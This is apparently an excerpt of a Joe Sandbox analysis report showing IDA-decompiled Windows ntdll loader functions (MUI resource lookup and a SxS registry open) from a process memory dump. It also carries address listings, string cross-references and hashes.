0x1f044b3e
0x1f044b45
0x00000000
0x1f044aa7
0x1f044aa7
0x1f044aac
0x1f044abd
0x1f044ac2
0x1f044ac6
0x1f044ac9
0x00000000
0x00000000
0x1f044acb
0x1f044b2e
0x1f044b36
0x1f044b3d
0x00000000
0x1f044b3d
0x1f044acd
0x1f044acd
0x1f044ad0
0x00000000
0x00000000
0x1f044ad2
0x1f044ada
0x1f044ada
0x00000000
0x00000000
0x1f044adc
0x1f044adf
0x00000000
0x00000000
0x1f044ae1
0x1f044ae4
0x1f044b1c
0x1f044b21
0x1f044b22
0x1f044b24
0x1f044ae6
0x1f044ae9
0x1f044afc
0x1f044b01
0x1f044b02
0x1f044b04
0x1f044b04
0x1f044ae9
0x00000000
0x1f044ad7
0x1f044ad7
0x00000000
0x1f044ad7
0x1f044aa7

Strings

LdrpGenericExceptionFilter, xrefs: 1F044A7C
***Exception thrown within loader***, xrefs: 1F044AA7
Execute '.cxr %p' to dump context, xrefs: 1F044B31
minkernel\ntdll\ldrutil.c, xrefs: 1F044A86
Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 1F044AB8
Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 1F044A75
LdrpProtectedCopyMemory, xrefs: 1F044A74

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
API String ID: 0-2973941816
Opcode ID: 8cd43cf5b1d491d3c20f9ce2a0849dce9a6fca4e69c3368c96d16d01e7db3a2f
Instruction ID: 9d9b051bcdf0eef9746fcb1f14d9df6890b1fa2172e9a85ba82dee9c97f84e86
Opcode Fuzzy Hash: 8cd43cf5b1d491d3c20f9ce2a0849dce9a6fca4e69c3368c96d16d01e7db3a2f
Instruction Fuzzy Hash: 3A218BBE504154BFE314CA698C50FAAB7D9FF815A1F310721FD12ABA40D660FD10C265

Uniqueness

Uniqueness Score: -1.00%

Function 1EFCAD00 Relevance: 8.1, Strings: 6, Instructions: 573
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E1EFCAD00(signed int __ecx, signed int __edx, signed int _a4, signed int* _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, char** _a28) {
				char _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				short _v204;
				short _v720;
				signed short _v724;
				void* _v725;
				signed int _v732;
				char _v733;
				char _v734;
				char _v735;
				char _v736;
				signed int _v740;
				void* _v744;
				signed int _v748;
				signed int _v752;
				signed int _v756;
				signed int _v760;
				void* _v764;
				char* _v768;
				char _v772;
				signed int _v776;
				signed int _v780;
				char** _v784;
				void* _v788;
				void* _v792;
				void* _v796;
				void* _v800;
				signed int _v804;
				signed int _v808;
				signed int _v812;
				char _v816;
				signed int _v820;
				char* _v832;
				short _v834;
				signed short _v836;
				char* _v840;
				char _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t243;
				signed int _t244;
				signed int* _t251;
				signed char* _t252;
				signed int _t253;
				signed char* _t254;
				signed int* _t259;
				signed char* _t260;
				signed int _t261;
				signed char* _t262;
				signed int _t271;
				signed int _t285;
				intOrPtr _t288;
				signed int _t292;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed short _t299;
				signed int _t303;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr* _t325;
				intOrPtr _t326;
				signed char _t328;
				signed int _t331;
				signed int _t334;
				signed int _t340;
				void* _t341;
				signed int* _t343;
				signed int _t345;
				signed int _t352;
				signed int _t355;
				signed int _t356;
				intOrPtr* _t358;
				char* _t378;
				char* _t379;
				signed int _t380;
				signed int _t382;
				void* _t383;
				signed int _t384;
				signed int _t385;
				signed int _t387;
				void* _t388;
				void* _t389;
				signed int _t390;
				void* _t391;
				intOrPtr _t392;
				signed int _t410;
				void* _t415;

				_push(0xfffffffe);
				_push(0x1f09bf60);
				_push(E1F00AD20);
				_push( *[fs:0x0]);
				_t392 = _t391 - 0x338;
				_t243 =  *0x1f0bb370;
				_v12 = _v12 ^ _t243;
				_t244 = _t243 ^ _t390;
				_v32 = _t244;
				_push(_t244);
				 *[fs:0x0] =  &_v20;
				_v28 = _t392;
				_v760 = __edx;
				_v748 = __ecx;
				_t343 = _a8;
				_v752 = _t343;
				_v776 = _a16;
				_v812 = _a20;
				_v820 = _a24;
				_v784 = _a28;
				_v744 = 0;
				_v800 = 0;
				_v796 = 0;
				_v792 = 0;
				_v788 = 0;
				_v733 = 0;
				_t340 = _a4;
				if((_t340 & 0x00000040) != 0) {
					_v734 = 1;
				} else {
					_v734 = 0;
				}
				_v735 = 0;
				_v736 = 0;
				_v772 = 0x4c004a;
				_v768 = L"LdrpResSearchResourceMappedFile Enter";
				_v844 = 0x4a0048;
				_v840 = L"LdrpResSearchResourceMappedFile Exit";
				_t251 =  *( *[fs:0x30] + 0x50);
				if(_t251 != 0) {
					__eflags =  *_t251;
					if(__eflags == 0) {
						goto L3;
					}
					_t252 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					goto L4;
				} else {
					L3:
					_t252 = 0x7ffe0385;
					L4:
					if(( *_t252 & 0x00000001) != 0) {
						_t253 = E1EFD3C40();
						__eflags = _t253;
						if(_t253 == 0) {
							_t254 = 0x7ffe0384;
						} else {
							_t254 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E1F04FC01( &_v772,  *_t254 & 0x000000ff);
						_t343 = _v752;
					}
					_t387 = 0;
					_v756 = 0;
					_t382 = 0;
					if(_t340 < 0) {
						_t387 = 0x80;
						_v756 = 0x80;
					}
					_t371 = _a12;
					if(_t371 != 3) {
						_t345 = _v733;
						goto L10;
					} else {
						_t382 = _t343[2] & 0x0000ffff;
						_v8 = 0;
						_t333 =  *_t343;
						if(( *_t343 & 0xffff0000) != 0) {
							_t334 = E1F0079A0(_t333, L"MUI");
							_t392 = _t392 + 8;
							__eflags = _t334;
							if(__eflags != 0) {
								goto L8;
							}
							_t345 = 1;
							L9:
							_v733 = _t345;
							_v8 = 0xfffffffe;
							_t371 = _a12;
							L10:
							if((_t340 & 0x00000010) != 0 || _t371 - 1 > 2) {
								L21:
								if((_t387 & 0x00060000) == 0x60000) {
									_v732 = 0xc000008a;
									goto L51;
								}
								_t352 =  !_t387;
								_t271 =  !_t340;
								_t410 = _t271 & 0x00000010;
								asm("bt ecx, 0x13");
								asm("bt ecx, 0x11");
								_t371 = (_t371 & 0xffffff00 | _t410 != 0x00000000) & (_t271 & 0xffffff00 | _t410 > 0x00000000) & ((_t271 & 0xffffff00 | _t410 > 0x00000000) & 0xffffff00 | _t410 > 0x00000000);
								_v725 = _t410 != 0;
								_v724 = 1;
								_v720 = 0;
								if(_t371 != 0 || _a12 == 3) {
									if((_t340 & 0x00000010) != 0) {
										__eflags = _t340 & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										}
										goto L27;
									}
									L25:
									if((_t340 & 0x00000004) != 0) {
										_t387 = _t387 | 0x00000004;
										_v756 = _t387;
									}
									_t371 = _v760;
									_t352 = _v748;
									_t415 = E1EFCA2E0(_t352, _v760, _t382, _t387,  &_v724);
									if(_t415 < 0) {
										__eflags = _t340 & 0x00001000;
										if(__eflags != 0) {
											goto L55;
										}
									}
									goto L27;
								} else {
									L27:
									asm("bt eax, 0x12");
									asm("bt esi, 0x13");
									if(((( !_t387 & 0xffffff00 | _t415 >= 0x00000000) & 0xffffff00 | (_t340 & 0x00000010) == 0x00000000) & (_t352 & 0xffffff00 | _t415 >= 0x00000000) & ( !_t387 & 0xffffff00 | _t415 >= 0x00000000)) == 0) {
										_push( &_v792);
										_push( &_v800);
										_push(_t340);
										_push(_v760);
										_push(_v748);
										_t264 = E1EFCB360(_t340, _t382, _t387, __eflags);
										__eflags = _t264;
										if(_t264 >= 0) {
											goto L28;
										}
										goto L55;
									}
									L28:
									_t355 = _v725;
									L29:
									while(1) {
										if((_t387 & 0x00020000) != 0) {
											_t355 = 0;
											_v725 = 0;
										}
										_t384 = 0;
										_v732 = 0;
										_v740 = 0;
										_v764 = 0;
										_t371 = 0;
										while(1) {
											_v780 = _t371;
											if(_t371 >= (_v724 & 0x0000ffff)) {
												break;
											}
											if(_t355 != 0) {
												_v744 = 0;
												_v740 = 0;
												_t371 =  *(_t390 + _t371 * 8 - 0x2cc) & 0x0000ffff;
												_t288 =  *((intOrPtr*)(_t390 + _v780 * 8 - 0x2c8));
												__eflags = _t371;
												if(_t371 != 0) {
													__eflags = _t288 - 0xa;
													if(_t288 == 0xa) {
														_t384 = 0xc000000d;
														_v732 = 0xc000000d;
														L74:
														_t371 = _v780 + 1;
														continue;
													}
													_v764 = _t371;
													__eflags = _t355;
													if(__eflags == 0) {
														goto L33;
													}
													_push(_t387 | 0x00001000);
													_push( &_v740);
													_push( &_v744);
													_push(_v764);
													_push(_v748);
													_t384 = E1EFCBDE0(_t340, _t384, _t387, __eflags);
													_v732 = _t384;
													__eflags = _t384;
													if(_t384 < 0) {
														__eflags = _t384 - 0xc0000034;
														if(_t384 == 0xc0000034) {
															L117:
															_t384 = 0xc00b0001;
															_v732 = 0xc00b0001;
															L130:
															_t355 = _v725;
															goto L74;
														}
														__eflags = _t384 - 0xc000003a;
														if(_t384 != 0xc000003a) {
															goto L130;
														}
														goto L117;
													}
													_v735 = 1;
													__eflags = _v740;
													if(__eflags == 0) {
														_push(1);
														_push(0x200);
														_push( &_v740);
														_push(_v744);
														_t384 = E1EFCAB70(_t340, _t384, _t387, __eflags);
														_v732 = _t384;
													}
													__eflags = _t340 & 0x00001000;
													if(__eflags == 0) {
														L82:
														_push( &_v788);
														_push( &_v796);
														_push(_t340);
														_push(_v740);
														_push(_v744);
														_t384 = E1EFCB360(_t340, _t384, _t387, __eflags);
														_v732 = _t384;
														_t355 = _v725;
														__eflags = _t384;
														if(_t384 >= 0) {
															goto L33;
														}
														goto L74;
													} else {
														__eflags = _t384;
														if(__eflags < 0) {
															L48:
															_t355 = _v725;
															break;
														}
														goto L82;
													}
												}
												__eflags = _t288 - 2;
												if(_t288 != 2) {
													_t384 = 0xc000000d;
													_v732 = 0xc000000d;
												}
												goto L74;
											}
											L33:
											_v816 = 0;
											_t292 = (0 | _t355 != 0x00000000) - 0x00000001 &  &_v764;
											if(_t355 != 0) {
												_v804 = _t340 | 0x00000020;
											} else {
												_v804 = _t340;
											}
											_t378 = _v812;
											if(_t378 == 0) {
												_t378 =  &_v816;
											}
											_v808 = _t378;
											if(_t355 != 0) {
												_t379 = _v788;
											} else {
												_t379 = _v792;
											}
											_v768 = _t379;
											if(_t355 != 0) {
												_t385 = _v796;
											} else {
												_t385 = _v800;
											}
											if(_t355 != 0) {
												_t380 = _v740;
											} else {
												_t380 = _v760;
											}
											if(_t355 != 0) {
												_t356 = _v744;
											} else {
												_t356 = _v748;
											}
											_t371 = 0;
											_t384 = E1EFCE9A0(_t356, 0, _t380, _t385, _v768, 0, _v752, _a12,  &_v724, _v776, _v808, _v804, _t292);
											_v732 = _t384;
											if(_v734 != 0) {
												_t296 =  !_t387;
												__eflags = _t296 & 0x00040000;
												if((_t296 & 0x00040000) == 0) {
													goto L45;
												}
												_t297 = _v725;
												__eflags = _t384;
												if(_t384 < 0) {
													goto L58;
												}
												_t371 = _v776;
												__eflags = _t371;
												if(_t371 == 0) {
													goto L46;
												}
												__eflags = _t297;
												if(_t297 == 0) {
													goto L46;
												}
												_t310 = _v812;
												__eflags = _t310;
												if(_t310 == 0) {
													_t311 = _v816;
												} else {
													_t311 =  *_t310;
												}
												_t384 = E1EFC872A(_v744, _t371, _t311,  *((intOrPtr*)(_v752 + 0xc)), 1);
												_v732 = _t384;
												__eflags = _t384;
												if(_t384 < 0) {
													 *_v776 = 0;
													__eflags = _t384 - 0xc000007b;
													if(_t384 == 0xc000007b) {
														goto L51;
													}
												}
												goto L45;
											} else {
												L45:
												_t297 = _v725;
												L46:
												if(_t384 < 0) {
													L58:
													__eflags = _t297;
													if(__eflags != 0) {
														_t371 = _v760;
														_t298 = E1F0530EE(_t340, _v748, _v760, _t384, __eflags, _v744, _v740);
														__eflags = _t298;
														if(_t298 != 0) {
															goto L48;
														}
														goto L130;
													}
													__eflags = _t384;
													if(_t384 < 0) {
														goto L48;
													}
												}
												_t358 = _v784;
												if(_t358 != 0) {
													_t299 = _v764;
													__eflags = _t299;
													if(_t299 != 0) {
														_v832 =  &_v204;
														_v834 = 0xac;
														_t384 = E1EFE5A40(_t371, _t299 & 0x0000ffff,  &_v836, 2, 0);
														_v732 = _t384;
														__eflags = _t384;
														if(_t384 < 0) {
															goto L51;
														}
														_t303 = (_v836 & 0x0000ffff) >> 1;
														__eflags = _t303;
														_t358 = _v784;
														L135:
														_v768 = _t303;
														_v8 = 1;
														__eflags = _t303 -  *_t358;
														if(_t303 >=  *_t358) {
															L138:
															 *_t358 = _t303 + 1;
															_v732 = 0xc0000023;
															_v8 = 0xfffffffe;
															goto L51;
														}
														_t371 = _v820;
														__eflags = _t371;
														if(_t371 == 0) {
															goto L138;
														}
														_t389 = _t303 + _t303;
														E1F0088C0(_t371,  &_v204, _t389);
														_t392 = _t392 + 0xc;
														 *_v784 =  &(_v768[1]);
														 *((short*)(_t389 + _v820)) = 0;
														_v8 = 0xfffffffe;
														_t387 = _v756;
														goto L48;
													}
													_t303 = 0;
													_v204 = 0;
													goto L135;
												}
												goto L48;
											}
										}
										if(_t355 != 0) {
											__eflags = _t340 & 0x00200000;
											if((_t340 & 0x00200000) == 0) {
												_t371 = _v740;
												E1EFC0C12(_v744, _v740, _v752, _a12);
												_t355 = _v725;
											}
										}
										if(_t384 < 0) {
											__eflags = _t355;
											if(_t355 != 0) {
												__eflags = _v736;
												if(_v736 != 0) {
													L143:
													__eflags = _t387 & 0x00040000;
													if((_t387 & 0x00040000) != 0) {
														_t355 = 0;
														_v725 = 0;
													} else {
														_t387 = _t387 | 0x00020000;
														_v756 = _t387;
													}
													goto L62;
												}
												__eflags = _v735;
												if(_v735 != 0) {
													goto L143;
												}
												_t285 = L1EFB87E0(_v748);
												_t355 = _v725;
												__eflags = _t285;
												if(_t285 < 0) {
													goto L143;
												}
												_t387 = _t387 | 0x00400000;
												_v756 = _t387;
												_v736 = 1;
											}
											L62:
											__eflags = _t384;
											if(_t384 >= 0) {
												goto L51;
											}
											__eflags = _t355;
											if(_t355 == 0) {
												goto L51;
											}
											continue;
										} else {
											goto L51;
										}
									}
								}
							} else {
								_t325 = _v752;
								if(_t371 != 3) {
									_t371 = 0;
								} else {
									_t371 =  *(_t325 + 8) & 0x0000ffff;
								}
								if((_t340 & 0x01000000) != 0) {
									_t340 = _t340 | 0x00000010;
									goto L21;
								} else {
									_t326 =  *_t325;
									if(_t326 != 0x10) {
										__eflags = _t326 - 0x18;
										if(__eflags == 0) {
											goto L16;
										}
										__eflags = _t345;
										if(__eflags == 0) {
											L17:
											_push(1);
											_push(_t340);
											_push(0);
											_push(_v760);
											_push(_v748);
											_t331 = E1EFCB5E0(_t340, _t382, _t387, _t405);
											_v732 = _t331;
											if(_t331 >= 0) {
												_t371 = _v752;
												_t387 = _t387 | E1EFC8160(_v748, _t371, _t345, _t340);
												L20:
												_v756 = _t387;
												goto L21;
											}
											if(_t331 != 0xc000008a) {
												L51:
												_t259 =  *( *[fs:0x30] + 0x50);
												if(_t259 != 0) {
													__eflags =  *_t259;
													if( *_t259 == 0) {
														goto L52;
													}
													_t260 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													L53:
													if(( *_t260 & 0x00000001) != 0) {
														_t261 = E1EFD3C40();
														__eflags = _t261;
														if(_t261 == 0) {
															_t262 = 0x7ffe0384;
														} else {
															_t262 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
														}
														_t371 =  *_t262 & 0x000000ff;
														E1F04FC01( &_v844,  *_t262 & 0x000000ff);
													}
													_t264 = _v732;
													L55:
													 *[fs:0x0] = _v20;
													_pop(_t383);
													_pop(_t388);
													_pop(_t341);
													return E1F004B50(_t264, _t341, _v32 ^ _t390, _t371, _t383, _t388);
												}
												L52:
												_t260 = 0x7ffe0385;
												goto L53;
											}
											_t387 = _t387 | 0x00080000;
											goto L20;
										}
									}
									L16:
									_t328 =  !_t340;
									_t405 = _t328 & 0x00000008;
									if((_t328 & 0x00000008) != 0) {
										__eflags = _t371;
										if(__eflags != 0) {
											__eflags = _t371 - 0x400;
											if(__eflags == 0) {
												goto L70;
											}
											__eflags = _t371 - 0x800;
											if(__eflags != 0) {
												goto L17;
											}
										}
										L70:
										_t340 = _t340 | 0x00000010;
										goto L21;
									}
									goto L17;
								}
							}
						}
						L8:
						_t345 = 0;
						goto L9;
					}
				}
			}

0x1efcad05
0x1efcad07
0x1efcad0c
0x1efcad17
0x1efcad18
0x1efcad1e
0x1efcad23
0x1efcad26
0x1efcad28
0x1efcad2e
0x1efcad32
0x1efcad38
0x1efcad3b
0x1efcad41
0x1efcad47
0x1efcad4a
0x1efcad53
0x1efcad5c
0x1efcad65
0x1efcad6e
0x1efcad74
0x1efcad7e
0x1efcad88
0x1efcad92
0x1efcad9c
0x1efcada6
0x1efcadad
0x1efcadb3
0x1f023164
0x1efcadb9
0x1efcadb9
0x1efcadb9
0x1efcadc0
0x1efcadc7
0x1efcadce
0x1efcadd8
0x1efcade2
0x1efcadec
0x1efcadfc
0x1efcae01
0x1f023170
0x1f023173
0x00000000
0x00000000
0x1f023182
0x00000000
0x1efcae07
0x1efcae07
0x1efcae07
0x1efcae0c
0x1efcae0f
0x1f02318c
0x1f023191
0x1f023193
0x1f0231a5
0x1f023195
0x1f02319e
0x1f02319e
0x1f0231b3
0x1f0231b8
0x1f0231b8
0x1efcae15
0x1efcae17
0x1efcae1d
0x1efcae21
0x1f0231c3
0x1f0231c8
0x1f0231c8
0x1efcae27
0x1efcae2d
0x1efcb166
0x00000000
0x1efcae33
0x1efcae33
0x1efcae37
0x1efcae3e
0x1efcae45
0x1efcb336
0x1efcb33b
0x1efcb33e
0x1efcb340
0x00000000
0x00000000
0x1efcb346
0x1efcae4d
0x1efcae4d
0x1efcae53
0x1efcae5a
0x1efcae5d
0x1efcae60
0x1efcaedb
0x1efcaee7
0x1f023231
0x00000000
0x1f023231
0x1efcaeef
0x1efcaef3
0x1efcaef5
0x1efcaefa
0x1efcaf03
0x1efcaf0a
0x1efcaf0c
0x1efcaf18
0x1efcaf21
0x1efcaf2a
0x1efcaf35
0x1efcb17c
0x1efcb17f
0x00000000
0x00000000
0x00000000
0x1efcb185
0x1efcaf3b
0x1efcaf3e
0x1f023240
0x1f023243
0x1f023243
0x1efcaf4d
0x1efcaf53
0x1efcaf5e
0x1efcaf60
0x1f02324e
0x1f023254
0x00000000
0x00000000
0x1f02325a
0x00000000
0x1efcaf66
0x1efcaf66
0x1efcaf6a
0x1efcaf71
0x1efcaf82
0x1efcb110
0x1efcb117
0x1efcb118
0x1efcb119
0x1efcb11f
0x1efcb125
0x1efcb12a
0x1efcb12c
0x00000000
0x00000000
0x00000000
0x1efcb132
0x1efcaf88
0x1efcaf88
0x00000000
0x1efcaf90
0x1efcaf96
0x1f02325f
0x1f023261
0x1f023261
0x1efcaf9c
0x1efcaf9e
0x1efcafa4
0x1efcafac
0x1efcafb3
0x1efcafb5
0x1efcafb5
0x1efcafc4
0x00000000
0x00000000
0x1efcafcc
0x1efcb19b
0x1efcb1a5
0x1efcb1af
0x1efcb1bd
0x1efcb1c4
0x1efcb1c7
0x1efcb1ff
0x1efcb202
0x1f02326c
0x1f023271
0x1efcb1d9
0x1efcb1df
0x00000000
0x1efcb1df
0x1efcb208
0x1efcb20f
0x1efcb211
0x00000000
0x00000000
0x1efcb21e
0x1efcb225
0x1efcb22c
0x1efcb22d
0x1efcb233
0x1efcb23e
0x1efcb240
0x1efcb246
0x1efcb248
0x1f02327c
0x1f023282
0x1f023290
0x1f023290
0x1f023295
0x1f023378
0x1f023378
0x00000000
0x1f023378
0x1f023284
0x1f02328a
0x00000000
0x00000000
0x00000000
0x1f02328a
0x1efcb24e
0x1efcb255
0x1efcb25c
0x1f0232a0
0x1f0232a2
0x1f0232ad
0x1f0232ae
0x1f0232b9
0x1f0232bb
0x1f0232bb
0x1efcb262
0x1efcb268
0x1efcb272
0x1efcb278
0x1efcb27f
0x1efcb280
0x1efcb281
0x1efcb287
0x1efcb292
0x1efcb294
0x1efcb29a
0x1efcb2a0
0x1efcb2a2
0x00000000
0x00000000
0x00000000
0x1efcb26a
0x1efcb26a
0x1efcb26c
0x1efcb0b1
0x1efcb0b1
0x00000000
0x1efcb0b1
0x00000000
0x1efcb26c
0x1efcb268
0x1efcb1c9
0x1efcb1cc
0x1efcb1ce
0x1efcb1d3
0x1efcb1d3
0x00000000
0x1efcb1cc
0x1efcafd2
0x1efcafd2
0x1efcafea
0x1efcafee
0x1efcb2b2
0x1efcaff4
0x1efcaff4
0x1efcaff4
0x1efcaffa
0x1efcb002
0x1efcb171
0x1efcb171
0x1efcb008
0x1efcb010
0x1efcb2bd
0x1efcb016
0x1efcb016
0x1efcb016
0x1efcb01c
0x1efcb024
0x1efcb2c8
0x1efcb02a
0x1efcb02a
0x1efcb02a
0x1efcb032
0x1efcb2d3
0x1efcb038
0x1efcb038
0x1efcb038
0x1efcb040
0x1efcb2de
0x1efcb046
0x1efcb046
0x1efcb046
0x1efcb079
0x1efcb080
0x1efcb082
0x1efcb08f
0x1f0232c8
0x1f0232ca
0x1f0232cf
0x00000000
0x00000000
0x1f0232d5
0x1f0232db
0x1f0232dd
0x00000000
0x00000000
0x1f0232e3
0x1f0232e9
0x1f0232eb
0x00000000
0x00000000
0x1f0232f1
0x1f0232f3
0x00000000
0x00000000
0x1f0232f9
0x1f0232ff
0x1f023301
0x1f023307
0x1f023303
0x1f023303
0x1f023303
0x1f023326
0x1f023328
0x1f02332e
0x1f023330
0x1f02333c
0x1f023342
0x1f023348
0x00000000
0x00000000
0x1f02334e
0x00000000
0x1efcb095
0x1efcb095
0x1efcb095
0x1efcb09b
0x1efcb09d
0x1efcb134
0x1efcb134
0x1efcb136
0x1f02335f
0x1f02336b
0x1f023370
0x1f023372
0x00000000
0x00000000
0x00000000
0x1f023372
0x1efcb13c
0x1efcb13e
0x00000000
0x00000000
0x1efcb144
0x1efcb0a3
0x1efcb0ab
0x1f023383
0x1f02338a
0x1f02338d
0x1f0233a0
0x1f0233ab
0x1f0233c6
0x1f0233c8
0x1f0233ce
0x1f0233d0
0x00000000
0x00000000
0x1f0233dd
0x1f0233dd
0x1f0233df
0x1f0233e5
0x1f0233e5
0x1f0233eb
0x1f0233f2
0x1f0233f4
0x1f023441
0x1f023442
0x1f023444
0x1f02344e
0x00000000
0x1f02344e
0x1f0233f6
0x1f0233fc
0x1f0233fe
0x00000000
0x00000000
0x1f023400
0x1f02340c
0x1f023411
0x1f023421
0x1f02342b
0x1f02342f
0x1f023436
0x00000000
0x1f023436
0x1f02338f
0x1f023391
0x00000000
0x1f023391
0x00000000
0x1efcb0ab
0x1efcb08f
0x1efcb0b9
0x1efcb2e9
0x1efcb2ef
0x1efcb2fe
0x1efcb30a
0x1efcb30f
0x1efcb30f
0x1efcb2ef
0x1efcb0c1
0x1efcb149
0x1efcb14b
0x1f023488
0x1f02348f
0x1f0234c7
0x1f0234c7
0x1f0234cd
0x1f0234e0
0x1f0234e2
0x1f0234cf
0x1f0234cf
0x1f0234d5
0x1f0234d5
0x00000000
0x1f0234cd
0x1f023491
0x1f023498
0x00000000
0x00000000
0x1f0234a0
0x1f0234a5
0x1f0234ab
0x1f0234ad
0x00000000
0x00000000
0x1f0234af
0x1f0234b5
0x1f0234bb
0x1f0234bb
0x1efcb151
0x1efcb151
0x1efcb153
0x00000000
0x00000000
0x1efcb159
0x1efcb15b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1efcb0c1
0x1efcaf90
0x1efcae6a
0x1efcae6a
0x1efcae73
0x1f023201
0x1efcae79
0x1efcae79
0x1efcae79
0x1efcae83
0x1f023208
0x00000000
0x1efcae89
0x1efcae89
0x1efcae8e
0x1efcb31a
0x1efcb31d
0x00000000
0x00000000
0x1efcb323
0x1efcb325
0x1efcaea0
0x1efcaea0
0x1efcaea2
0x1efcaea3
0x1efcaea5
0x1efcaeab
0x1efcaeb1
0x1efcaeb6
0x1efcaebe
0x1efcb1e7
0x1efcb1f8
0x1efcaed5
0x1efcaed5
0x00000000
0x1efcaed5
0x1efcaec9
0x1efcb0c7
0x1efcb0cd
0x1efcb0d2
0x1f0234ed
0x1f0234f0
0x00000000
0x00000000
0x1f0234ff
0x1efcb0dd
0x1efcb0e0
0x1f023509
0x1f02350e
0x1f023510
0x1f023522
0x1f023512
0x1f02351b
0x1f02351b
0x1f023527
0x1f023530
0x1f023530
0x1efcb0e6
0x1efcb0ec
0x1efcb0ef
0x1efcb0f7
0x1efcb0f8
0x1efcb0f9
0x1efcb107
0x1efcb107
0x1efcb0d8
0x1efcb0d8
0x00000000
0x1efcb0d8
0x1efcaecf
0x00000000
0x1efcaecf
0x1efcb32b
0x1efcae94
0x1efcae96
0x1efcae98
0x1efcae9a
0x1efcb18a
0x1efcb18d
0x1f023215
0x1f023218
0x00000000
0x00000000
0x1f023223
0x1f023226
0x00000000
0x00000000
0x1f02322c
0x1efcb193
0x1efcb193
0x00000000
0x1efcb193
0x00000000
0x1efcae9a
0x1efcae83
0x1efcae60
0x1efcae4b
0x1efcae4b
0x00000000
0x1efcae4b
0x1efcae2d

Strings

#, xrefs: 1F023444
J, xrefs: 1EFCADCE
LdrpResSearchResourceMappedFile Enter, xrefs: 1EFCADD8
MUI, xrefs: 1EFCB330
LdrpResSearchResourceMappedFile Exit, xrefs: 1EFCADEC
H, xrefs: 1EFCADE2

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
API String ID: 0-4098886588
Opcode ID: f605bd0dc32205fe9ea481f0f0795e0c53ec94168ecc851e45b1dd54a69c35e5
Instruction ID: 002726605bdb10334a77fc6c8c3f50bb96d92ab70306a9f72756ef2c6b61eaf5
Opcode Fuzzy Hash: f605bd0dc32205fe9ea481f0f0795e0c53ec94168ecc851e45b1dd54a69c35e5
Instruction Fuzzy Hash: E932B075D402AE8BDB21CF15C8A4FDEB7B5AF44340F2046EAD84AA7250D732AE85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF2C10 Relevance: 7.7, Strings: 6, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E1EFF2C10(intOrPtr _a4, intOrPtr* _a8, signed int* _a12) {
				signed int _v8;
				char _v540;
				signed int _v544;
				char _v556;
				signed int _v560;
				signed int _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				signed int _v576;
				char _v580;
				char _v584;
				char* _v588;
				signed int _v590;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				intOrPtr _v604;
				signed int _v608;
				signed int _v612;
				signed short _v616;
				intOrPtr _v620;
				signed int _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				intOrPtr _t79;
				signed int _t82;
				intOrPtr _t84;
				intOrPtr* _t104;
				void* _t105;
				void* _t106;
				signed int _t109;
				void* _t112;
				intOrPtr _t113;
				void* _t119;
				signed int _t123;
				signed int* _t126;
				void* _t127;
				signed int _t131;
				signed int _t133;

				_t133 = (_t131 & 0xfffffff8) - 0x25c;
				_v8 =  *0x1f0bb370 ^ _t133;
				_t104 = _a8;
				_t126 = _a12;
				_t76 = _a4 - 1;
				if(_t76 == 0) {
					_v580 = 0x18;
					_push( &_v580);
					_v568 = 0x40;
					_push(8);
					_v600 = 0;
					_push( &_v600);
					_v576 = 0;
					_v572 = 0x1ef91338;
					_v564 = 0;
					_v560 = 0;
					_t79 = E1F002AB0();
					_v620 = _t79;
					if(_t79 >= 0 || _t79 == 0xc0000034 || _t79 == 0xc0000189) {
						_t80 = _v600;
						 *(_t104 + 0x18) =  *(_t104 + 0x18) | 0xffffffff;
						 *((intOrPtr*)(_t104 + 8)) = _v600;
					} else {
						_push(_t79);
						_t80 = E1F04EF10(0x33, 0, "SXS: Unable to open registry key %wZ Status = 0x%08lx\n", 0x1ef91338);
						 *((char*)(_t104 + 0x1c)) = 1;
						L36:
						_t133 = _t133 + 0x14;
						if(_t126 == 0) {
							L9:
							_pop(_t119);
							_pop(_t127);
							_pop(_t105);
							return E1F004B50(_t80, _t105, _v8 ^ _t133, _t115, _t119, _t127);
						}
						_t80 = _v608;
						L38:
						 *_t126 = _t80;
					}
					goto L9;
				}
				_t82 = _t76 - 1;
				if(_t82 != 0) {
